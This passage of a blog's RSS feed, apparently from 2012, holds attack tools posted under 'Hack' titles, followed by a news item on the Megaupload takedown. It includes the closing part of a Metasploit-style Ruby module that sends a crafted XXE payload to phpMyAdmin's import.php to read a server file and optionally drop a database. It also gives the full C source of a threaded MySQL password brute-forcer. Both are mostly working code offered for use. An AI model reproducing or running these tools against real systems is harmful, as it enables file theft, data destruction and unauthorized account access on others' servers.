 craftedXML &lt;&lt; " &lt;column name=\"file\"&gt;&amp;conteudo;&lt;/column&gt;\n"
 craftedXML &lt;&lt; " &lt;/table&gt;\n"
 craftedXML &lt;&lt; " &lt;/database&gt;\n"
 craftedXML &lt;&lt; "&lt;/pma_xml_export&gt;\n\n"
 craftedXML &lt;&lt; "------WebKitFormBoundary3XPL01T\n"
 craftedXML &lt;&lt; "Content-Disposition: form-data; name=\"format\"\n\n"
 craftedXML &lt;&lt; "xml\n"
 craftedXML &lt;&lt; "------WebKitFormBoundary3XPL01T\n"
 craftedXML &lt;&lt; "Content-Disposition: form-data; name=\"csv_terminated\"\n\n"
 craftedXML &lt;&lt; ",\n\n"
 craftedXML &lt;&lt; "------WebKitFormBoundary3XPL01T--"

 print_status("Grabbing that #{datastore['FILE']} you want...")
 res = send_request_cgi({
 'uri' =&gt; datastore['APP']+'/import.php',
 'method' =&gt; 'POST',
 'version' =&gt; '1.1',
 'headers' =&gt;{
 'Content-Type' =&gt; 'multipart/form-data; boundary=----WebKitFormBoundary3XPL01T',
 'Cookie' =&gt; cookie
 },
 'data' =&gt; craftedXML
 }, 25)

 readfile(cookie,tokenvalue)

 if (datastore['DROP'] == "true")
 dropdatabase(cookie,tokenvalue)
 else
 print_status("Database was not dropped: "+datastore['DB'])
 end

 end
end</code></pre>
<div id="seo_alrp_related"><h2>Posts Related to Hack - phpMyAdmin 3.3.x / 3.4.x Local File Inclusion Via XXE Injection</h2><ul><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/07/10/hack-phpmyadmin-3x-swekey-remote-code-injection/" rel="bookmark">Hack &#8211; phpMyAdmin 3.x Swekey Remote Code Injection</a></h3><p>&lt;?php /* # Exploit Title: phpMyAdmin 3.x Swekey Remote Code Injection Exploit # Date: 2011-07-09 # Author: Mango of ha.xxor.se # Version: phpMyAdmin &lt; 3.3.10.2 ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/10/11/hack-mybb-164-backdoor-exploit/" rel="bookmark">Hack &#8211; myBB 1.6.4 Backdoor Exploit</a></h3><p>## # $Id: mybb_backdoor.rb 13850 2011-10-10 15:40:59Z hdm $ ## ## # This file is part of the Metasploit Framework and may be subject to ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/07/25/hack-phpmyadmin-3x-swekey-session-manipulation/" rel="bookmark">Hack &#8211; phpMyAdmin 3.x Swekey Session Manipulation</a></h3><p>phpMyAdmin versions below 3.3.10.3 and 3.4.3.2 suffer from a session manipulation vulnerability when the Swekey extension is activated. ############################################################################### phpMyAdmin 3.x Conditional Session Manipulation ###############################[ ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/05/31/hack-joomla-16x-administrator-php-code-execution/" rel="bookmark">Hack &#8211; Joomla 1.6.x Administrator PHP Code Execution</a></h3><p>This Metasploit module can be used to gain a remote shell to a Joomla! 1.6.x install when administrator credentials are known. This is achieved by ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/07/10/hack-phpmyadmin3-remote-code-execution/" rel="bookmark">Hack &#8211; phpMyAdmin3 Remote Code Execution</a></h3><p>Remote code execution exploit for phpMyAdmin versions below 3.3.10.2 and 3.4.3.1. #!/usr/bin/env python # coding=utf-8 # pma3 - phpMyAdmin3 remote code execute exploit # Author: ...</p></div></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://www.smoothblog.co.uk/2012/01/22/hack-phpmyadmin-33x-34x-local-file-inclusion-xxe-injection/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hacking &#8211; MySQL Brute Force Tool</title>
		<link>http://www.smoothblog.co.uk/2012/01/22/hacking-mysql-brute-force-tool/</link>
		<comments>http://www.smoothblog.co.uk/2012/01/22/hacking-mysql-brute-force-tool/#comments</comments>
		<pubDate>Sun, 22 Jan 2012 15:27:14 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Technology]]></category>

		<guid isPermaLink="false">http://www.smoothblog.co.uk/?p=10195</guid>
		<description><![CDATA[/* * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope [...]]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.smoothblog.co.uk%2F2012%2F01%2F22%2Fhacking-mysql-brute-force-tool%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.smoothblog.co.uk%2F2012%2F01%2F22%2Fhacking-mysql-brute-force-tool%2F&amp;source=smoothblog&amp;style=normal&amp;service=bit.ly&amp;service_api=R_69b2097aa0e1b6d642c5d4634b9831a7&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<pre><code>/*
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU Library General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
 *
 * $Id: brute-mysql.c,v 1.1 2012/01/19 22:32:19 james.stevenson Exp $
 *
 * Author:
 * NAME: James Stevenson
 * WWW: http://www.stev.org
 *
 */

#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;stdarg.h&gt;
#include &lt;getopt.h&gt;
#include &lt;string.h&gt;
#include &lt;pthread.h&gt;

#include &lt;mysql/mysql.h&gt;

int verbose = 0;
int total = 0;
volatile int quit = 0;

pthread_mutex_t mutex_pass = PTHREAD_MUTEX_INITIALIZER;

struct args {
 char *host;
 char *db;
 int port;
};

void print_help(FILE *fp, char *app) {
 fprintf(fp, "Usage: %s [&lt;options&gt;]\n", app);
 fprintf(fp, "\n");
 fprintf(fp, " -h Print this help and exit\n");
 fprintf(fp, " -v Verbose. Repeat for more info\n");
 fprintf(fp, " -t &lt;host&gt; host to try\n");
 fprintf(fp, " -p &lt;port&gt; port to connect on\n");
 fprintf(fp, " -n &lt;num&gt; number of threads to use\n");
 fprintf(fp, "\n");
 fprintf(fp, "Note: usernames / password will be read from stdin\n");
 fprintf(fp, "The format for this is username:password\n");
 fprintf(fp, "\n");
}

int try(char *hostname, char *username, char *password, char *db, int port) {
 MYSQL mysql;
 mysql_init(&amp;mysql);

 if (!mysql_real_connect(&amp;mysql, hostname, username, password, db, port, NULL, 0)) {
 switch(mysql_errno(&amp;mysql)) {
 case 1045: /* ER_ACCESS_DENIED_ERROR */
 if (verbose &gt;= 1)
 printf("Failed: %d %s\n", mysql_errno(&amp;mysql), mysql_error(&amp;mysql));
 break;
 default:
 printf("Unknown Error: %d -&gt; %s\n", mysql_errno(&amp;mysql), mysql_error(&amp;mysql));
 break;
 }
 return 0;
 }

 if (verbose &gt;= 1)
 printf("Success: %d %s\n", mysql_errno(&amp;mysql), mysql_error(&amp;mysql));

 mysql_close(&amp;mysql);
 return 1;
}

int getpassword(char **buf, size_t *buflen, char **username, char **password) {

 pthread_mutex_lock(&amp;mutex_pass);

 if (getline(buf, buflen, stdin) &gt;= 0) {
 pthread_mutex_unlock(&amp;mutex_pass);
 char *tmp = strchr(*buf, ':');
 if (tmp == 0 || tmp[1] == 0)
 return 0;
 *username = *buf;
 *tmp = 0;
 tmp++;
 *password = tmp;
 tmp = strchr(*password, '\n');
 if (tmp != 0)
 *tmp = 0;
 if (verbose &gt;= 2)
 printf("username: %s password: %s\n", *username, *password);
 return 1;
 }

 pthread_mutex_unlock(&amp;mutex_pass);
 return 0;
}

void *run(void *p) {
 struct args *a = (struct args *) p;
 char *buf = 0;
 size_t buflen = 0;
 char *user = 0;
 char *pass = 0;

 while(quit == 0) {
 if (getpassword(&amp;buf, &amp;buflen, &amp;user, &amp;pass) == 0)
 goto free; /* we ran out of passwords */

 if (try(a-&gt;host, user, pass, a-&gt;db, a-&gt;port)) {
 printf("Success! Username: %s Password: %s\n", user, pass);
 quit = 1;
 goto free;
 }
 }

free:
 if (buf != NULL)
 free(buf);

 pthread_exit(NULL);
 return NULL;
}

int main(int argc, char **argv) {
 struct args args;
 pthread_t *thd;
 pthread_attr_t attr;
 int nthreads = 1;
 int i = 0;
 int c;

 memset(&amp;args, 0, sizeof(args));

 while( (c = getopt(argc, argv, "d:hn:p:t:v")) != -1) {
 switch(c) {
 case 'd':
 args.db = optarg;
 break;
 case 'h':
 print_help(stdout, argv[0]);
 exit(EXIT_SUCCESS);
 break;
 case 'n':
 nthreads = atoi(optarg);
 break;
 case 't':
 args.host = optarg;
 break;
 case 'v':
 verbose++;
 break;
 case 'p':
 args.port = atoi(optarg);
 break;
 }
 }

 if (args.db == NULL)
 args.db = "mysql";

 if (args.host == NULL)
 args.host = "localhost";

 thd = malloc(nthreads * sizeof(*thd));
 if (!thd) {
 perror("malloc");
 exit(EXIT_FAILURE);
 }

 mysql_library_init(0, NULL, NULL); 

 if (pthread_attr_init(&amp;attr) != 0) {
 perror("pthread_attr_init");
 exit(EXIT_FAILURE);
 }

 if (pthread_attr_setdetachstate(&amp;attr, PTHREAD_CREATE_JOINABLE) != 0) {
 perror("pthread_attr_setdetachstate");
 exit(EXIT_FAILURE);
 }

 for(i=0;i&lt;nthreads;i++) {
 if (pthread_create(&amp;thd[i], NULL, run, &amp;args) != 0) {
 perror("pthread_create");
 exit(EXIT_FAILURE);
 }
 }

 for(i=0;i&lt;nthreads;i++) {
 if (pthread_join(thd[i], NULL) != 0) {
 perror("pthread_join");
 exit(EXIT_FAILURE);
 }
 }

 pthread_attr_destroy(&amp;attr);

 free(thd); 

 mysql_library_end();
 return EXIT_SUCCESS;
}</code></pre>
<div id="seo_alrp_related"><h2>Posts Related to Hacking - MySQL Brute Force Tool</h2><ul><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/12/27/hack-lighttpd-1430-15-denial-service/" rel="bookmark">Hack &#8211; Lighttpd 1.4.30 / 1.5 Denial Of Service</a></h3><p>/* * Primitive Lighttpd Proof of Concept code for CVE-2011-4362 vulnerability discovered by Xi Wang * * Here the vulnerable code (src/http_auth.c:67) * * --- ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/12/27/hack-telnetd-encryptkeyid-remote-root/" rel="bookmark">Hack &#8211; Telnetd encrypt_keyid Remote Root</a></h3><p>/*************************************************************************** * telnetd-encrypt_keyid.c * * Mon Dec 26 20:37:05 CET 2011 * Copyright 2011 Jaime Penalba Estebanez (NighterMan) * * nighterman@painsec.com - jpenalbae@gmail.com * Credits ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2012/01/24/hack-linux-local-root-suid-prodpidmem-write/" rel="bookmark">Hack &#8211; Linux Local Root Via SUID /prod/pid/mem Write</a></h3><p>/* * Mempodipper * by zx2c4 * * Linux Local Root Exploit * * Rather than put my write up here, per usual, this time ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/06/14/hacking-dns-distributed-reflected-denial-service-tool/" rel="bookmark">Hacking &#8211; DNS Distributed Reflected Denial Of Service Tool</a></h3><p>Proof of concept code that demonstrates a distributed DNS reflection denial of service attack. This code is a little bit long so wont be leaving ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/01/05/ps3-scekrit-tool-private-sony-keys/" rel="bookmark">PS3 &#8211; SCEkrit a Tool To Get Private Sony Keys</a></h3><p>This little big of code can be useful in obtaining the needed 'private' keys for SIGNING your own 'homebrew', since as Team fail0verflow pointed out ...</p></div></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://www.smoothblog.co.uk/2012/01/22/hacking-mysql-brute-force-tool/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>MegaUpload TakeDown &#8211; Founders Arrested Charged with Piracy</title>
		<link>http://www.smoothblog.co.uk/2012/01/19/megaupload-takedown-founders-arrested-charged-piracy/</link>
		<comments>http://www.smoothblog.co.uk/2012/01/19/megaupload-takedown-founders-arrested-charged-piracy/#comments</comments>
		<pubDate>Thu, 19 Jan 2012 22:28:35 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Technology]]></category>

		<guid isPermaLink="false">http://www.smoothblog.co.uk/?p=10177</guid>
		<description><![CDATA[One of the worlds most popular file sharing websites &#8212; Megaupload &#8212; who had been in the news recently for their controversial song featuring many famous artists, has been shut down by federal prosecutors in the United States. The New York Times reports that the indictment accuses the company of costing over $500 million in [...]]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.smoothblog.co.uk%2F2012%2F01%2F19%2Fmegaupload-takedown-founders-arrested-charged-piracy%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.smoothblog.co.uk%2F2012%2F01%2F19%2Fmegaupload-takedown-founders-arrested-charged-piracy%2F&amp;source=smoothblog&amp;style=normal&amp;service=bit.ly&amp;service_api=R_69b2097aa0e1b6d642c5d4634b9831a7&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>One of the worlds most popular file sharing websites &#8212; <strong>Megaupload</strong> &#8212; who had been in the news recently for their controversial song featuring many famous artists, has been shut down by federal prosecutors in the <strong>United States.</strong></p>
<p>The <a href="http://www.nytimes.com/2012/01/20/technology/indictment-charges-megaupload-site-with-piracy.html">New York Times</a> reports that the indictment accuses the company of costing over $500 million in lost revenue due to pirated films, TV shows, music and other content.</p>
<p><strong>Megaupload founder</strong> and operator &#8212; <strong>Kim Dotcom</strong> was arrested along with three others in <strong>New Zealand</strong> on Thursday at the request of US officials. A total of seven were arrested globally, and their charges include conspiracy to commit racketeering and criminal copyright infringement for running the &#8221;the Mega conspiracy websites&#8221; according to the DOJ.</p>
<p>Dotcom is no stranger to the wrong side of the law, previously being convicted for credit card fraud, hacking, insider trading and embezzlement.</p>
<p>Just before the site was taken down today, it posted a statement on its homepage saying that claims they facilitated copyright infringement were &#8221;grotesquely overblown&#8221; and went on to say &#8221;The fact is that the vast majority of Mega’s Internet traffic is legitimate, and we are here to stay. If the content industry would like to take advantage of our popularity, we are happy to enter into a dialogue. We have some good ideas. Please get in touch.&#8221;</p>
<p><object width="640" height="360"><param name="movie" value="http://www.youtube.com/v/o0Wvn-9BXVc&#038;hl=en_US&#038;feature=player_embedded&#038;version=3"></param><param name="allowFullScreen" value="true"></param><param name="allowScriptAccess" value="always"></param><embed src="http://www.youtube.com/v/o0Wvn-9BXVc&#038;hl=en_US&#038;feature=player_embedded&#038;version=3" type="application/x-shockwave-flash" allowfullscreen="true" allowScriptAccess="always" width="640" height="360"></embed></object></p>
<div id="seo_alrp_related"><h2>Posts Related to MegaUpload TakeDown - Founders Arrested Charged with Piracy</h2><ul><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2009/12/09/record-industry-sued-for-6-billion/" rel="bookmark">Record Industry Sued for $6 Billion!</a></h3><p>“Between $50 million and $6 billion may be owed to musicians and artists in Canada, but not from your run-of-the-mill file sharers. The Canadian recording ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/02/03/gitorious-sony/" rel="bookmark">Gitorious Vs Sony</a></h3><p>An update on the Sony DMCA issue We have just sent an email to Sony’s legal attournes in reply to their DMCA takedown notice sent ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/01/28/fbi-arrests-40-wikileaks-hacktivists/" rel="bookmark">FBI Arrests 40 Wikileaks Hacktivists</a></h3><p>A report from mcclatchydc mentions that the FBI said Thursday it had served more than 40 search warrants throughout the United States as part of ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/01/28/5-men-arrested-uk-wikileaksanonymous-payback-attacks/" rel="bookmark">5 Men Arrested in UK in Wikileaks/Anonymous Payback Attacks</a></h3><p>U.K. police arrested five men in dawn raids Thurday morning, alleging they were part of the Anonymous attacks on the websites of Visa, Mastercard and ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/09/03/hackers-south-yorkshire-wiltshire-arrested-lulzsec-anonymous/" rel="bookmark">Two Hackers in South Yorkshire and Wiltshire Arrested (LulzSec &#8211; Anonymous)</a></h3><p>Two men have been arrested in connection with online attacks by hacking gangs Anonymous and LulzSec, Scotland Yard said. The men, aged 24 and 20, ...</p></div></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://www.smoothblog.co.uk/2012/01/19/megaupload-takedown-founders-arrested-charged-piracy/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

